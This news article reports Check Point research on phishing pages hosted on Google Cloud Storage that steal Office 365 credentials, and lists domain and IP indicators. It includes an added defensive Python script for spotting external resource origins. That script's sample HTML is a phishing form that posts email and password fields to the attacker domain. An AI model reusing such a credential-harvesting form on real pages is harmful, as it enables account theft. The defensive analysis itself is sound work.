Posted on July 22, 2020 at 12:42 PM
Check Point researchers revealed yesterday that some hackers are using Google Cloud Platform (GCP) to conceal their phishing attacks. According to Check Point, they do this by abusing advanced features of a popular cloud storage service to disguise their malicious intent and avoid getting caught. Because the pages sit on legitimate cloud infrastructure, the attacks escape the traditional red flags of websites without HTTPS certificates or suspicious-looking domains.
In some instances, the hackers uploaded PDF documents to Google Drive containing a link to a phishing page that requests Office 365 credentials and then redirects the victim to a genuine PDF report published by a popular global consulting firm.
Although the malicious source code is coming from a Ukrainian IP address, the phishing page is hosted on Google Cloud storage.
Phishing document has a link to a malicious page
Earlier this year, the researchers at Check Point stumbled upon an attack in which the actors uploaded PDF documents to Google Drive. The uploaded PDF document contained a link to a phishing page. The page was hosted on storage.googleapis[.]com/asharepoint-unwearied_439052791/index.html and directed the user to log in with an organization email or Office 365 account.
Whichever option the user chooses, a pop-up window showing the Outlook login page appears.
Once the user enters the credentials, they are directed to a genuine PDF report published by a known global consulting company. The user may not suspect that the request is a phishing one, since the phishing page is hosted on Google Cloud Storage. The source code of the phishing page, however, reveals that the majority of the resources are loaded from prvtsmtp[.]com, the attackers' website.
Actors are using Ukrainian IP address
The phishing actors are now making use of Google Cloud Functions, a service that enables running code in the cloud.
In this attack, Google Cloud Functions were used to load the resources on the phishing page, so that the attacker's domain details remained hidden.
When Check Point looked into prvtsmtp[.]com, the security firm discovered that it resolved to 31.28.168[.]4, an IP address in Ukraine.
Several other similar domains relating to the phishing attack resolve to the same IP address, or to a different one within the same netblock.
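The tell in this campaign is that a page served from a trusted cloud bucket loads its scripts from, and submits its form to, a domain the defender has never seen. The following added example (not Check Point's code, and not part of the original article) lists the external origins a page depends on, so an analyst triaging a reported link can spot that pattern; the bucket name and HTML are constructed samples, and the allowlist is assumed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Attributes that make a browser fetch from, or submit to, another origin.
_URL_ATTRS = {"src", "href", "action", "data-src"}


class _ResourceCollector(HTMLParser):
    """Collect every absolute URL the page loads from or posts forms to."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in _URL_ATTRS and value:
                self.urls.append(urljoin(self.base_url, value))


def external_origins(page_url, html, trusted_hosts=()):
    """Hosts other than the page's own host (and any trusted ones) that the
    page pulls resources from or submits credentials to."""
    own_host = urlsplit(page_url).hostname
    parser = _ResourceCollector(page_url)
    parser.feed(html)
    hosts = set()
    for url in parser.urls:
        host = urlsplit(url).hostname
        if host and host != own_host and host not in trusted_hosts:
            hosts.add(host)
    return hosts


# Constructed sample modelled on the page the article describes: hosted in a
# Google Cloud Storage bucket (bucket name made up), but loading its script
# from, and posting the form to, the attacker domain named in the article.
SAMPLE_PAGE_URL = "https://storage.googleapis.com/example-bucket/index.html"
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="style.css">
<script src="https://prvtsmtp.com/js/login.js"></script>
</head><body>
<form action="https://prvtsmtp.com/post.php" method="post">
  <input name="email"><input name="password" type="password">
</form>
<img src="https://www.google.com/favicon.ico">
</body></html>"""

if __name__ == "__main__":
    print(external_origins(SAMPLE_PAGE_URL, SAMPLE_HTML, {"www.google.com"}))
```

Relative resources such as style.css resolve to the bucket itself and are ignored; only the attacker-controlled domain remains.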
“Hackers are swarming around the cloud storage services that we rely on and trust, making it much tougher to identify a phishing attack,” the Check Point research team said.
Check Point further pointed out that conventional phishing red flags, such as websites without HTTPS certificates or look-alike domains, will not be enough to identify these attacks, because the current actors are concealing their tracks carefully. Detection has become even harder during the pandemic, as attackers take advantage of lax security to pounce on unsuspecting victims.
Users of Google Cloud Platform, as well as Azure and AWS users, have been advised to be cautious of this recent phishing trend and to protect themselves. Check Point says the way to do so is to be wary of files received from unsolicited senders.
Check Point cautioned users to beware of unfamiliar email senders, spelling errors in websites or emails, and look-alike domains. Users should also be cautious about files received from unknown senders that request certain actions from them.
Also, users should make sure they are ordering goods from a genuine source. The best way to ensure this is not to click on promotional links in emails or on any website. Instead, they should search on Google and find the desired link on Google's results page, or, if they already know the site's address, type it in directly.
Users are also warned against "special" offers of a cure for coronavirus, which are generally not trustworthy or reliable purchase opportunities. Finally, the researchers warn that users should stop reusing passwords across different accounts and applications.